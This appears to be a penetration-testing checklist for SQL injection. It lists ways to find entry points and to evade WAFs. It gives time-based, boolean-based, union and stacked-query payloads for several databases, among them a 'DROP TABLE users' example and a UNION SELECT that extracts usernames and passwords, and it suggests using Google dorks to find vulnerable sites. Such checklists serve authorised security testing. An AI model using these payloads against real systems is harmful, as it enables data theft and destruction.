-
Entry Point Detection
- Identify potential SQL injection entry points in the application.
- Check input fields, URL parameters, headers, cookies, and other data entry points.
-
Testing Techniques
- Test with simple characters (e.g., ', ", ;, --, /* */) to observe the application's basic response to SQL injection.
- Use multiple encoding layers (e.g., URL encoding, Base64) to assess filter bypass capabilities.
- Try merging characters to form unexpected SQL queries (e.g., `' OR 1=1 --`).
- Perform logical testing to see how the application handles SQL logic (e.g., `AND 1=1`, `OR 1=1`).
- Include special characters (e.g., @, #, $, ^, *, (, )) to test input sanitization processes.
- Test for second-order SQL injection by modifying input that is later processed in SQL queries.
-
Detection and Evasion
- Automated SQL Injection Detection & WAF Evasion Techniques
- Run SQL injection scanner on all requests to detect vulnerabilities.
- Attempt to bypass Web Application Firewalls (WAF) with advanced techniques:
- Inserting a null byte before the SQL payload.
- Using SQL inline comment sequences (--, /* */).
- Employing URL encoding to obfuscate malicious inputs.
- Alternating between uppercase and lowercase to evade case-sensitive filters.
- Using SQLmap tamper scripts to automate evasion tactics.
- Use time delays and error messages to infer SQL injection (e.g., `AND 1=BENCHMARK(10000000,MD5(1))`).
- Time-Based SQL Injection:
- Oracle: Test with dbms_pipe.receive_message(('a'), 10).
- Microsoft: Use WAITFOR DELAY '0:0:10'.
- PostgreSQL: Execute SELECT pg_sleep(10).
- MySQL: Perform SELECT sleep(10).
- Conditional Delays for Blind SQL Injection:
- Oracle: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'), 10) ELSE NULL END FROM dual.
- Microsoft: IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'.
- PostgreSQL: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END.
- MySQL: SELECT IF(YOUR-CONDITION-HERE, sleep(10), 'a').
-
Boolean-Based SQL Injection:
- Oracle: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'true' ELSE 'false' END FROM dual.
- Microsoft: IF (YOUR-CONDITION-HERE) SELECT 'true' ELSE SELECT 'false'.
- PostgreSQL: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'true' ELSE 'false' END.
- MySQL: SELECT IF(YOUR-CONDITION-HERE, 'true', 'false').
-
Error-Based SQL Injection
- General: Inject payloads to generate SQL errors (e.g., `' OR 1=1 --`, `"`).
-
General SQL Injection Testing
- Test SQL Injection on authentication forms (login, registration).
- Test SQL Injection on the search bar.
- Test SQL Injection on editable characteristics (profile updates, comments).
- Use tools like SQLmap, Burp Suite, or Hackbar.
- Use Google dorks to find SQL keywords and potentially vulnerable sites.
- Test all types of SQL Injection (GET, POST, COOKIE, HEADER).
- Try SQL Injection with various methods like null bytes, URL encoding, case changes, and tamper scripts.
- Try SQL Injection with SQL Time delay and conditional delays.
- Try Boolean-based, Time-based, and Error-based SQL Injection techniques.
- Test for out-of-band SQL injection to capture data sent to an external server.
-
Techniques
- Test for stacked queries (e.g., `; DROP TABLE users;--`).
- Check for union-based SQL injection (e.g., `UNION SELECT NULL, username, password FROM users--`).
- Test for subqueries and nested queries.
- Assess the application's use of parameterized queries and stored procedures.
- Verify if error handling reveals sensitive database information.
- Perform fuzz testing on all SQL query parameters.